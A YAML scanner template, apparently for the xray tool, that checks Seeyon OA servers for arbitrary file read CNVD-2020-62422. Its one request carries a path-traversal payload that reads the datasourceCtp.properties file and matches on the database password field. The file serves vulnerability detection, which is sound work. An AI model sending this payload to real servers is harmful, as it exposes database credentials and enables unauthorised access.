id: CNVD-2020-62422

info:
  name: 致远oa系统存在任意文件读取漏洞
  author: Aquilao(https://github.com/Aquilao)
  severity: medium
  reference:
    - https://www.CNVD.org.cn/flaw/show/CNVD-2020-62422

rules:
    r0:
        request:
            method: GET
            path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
        expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password")
expression: r0()
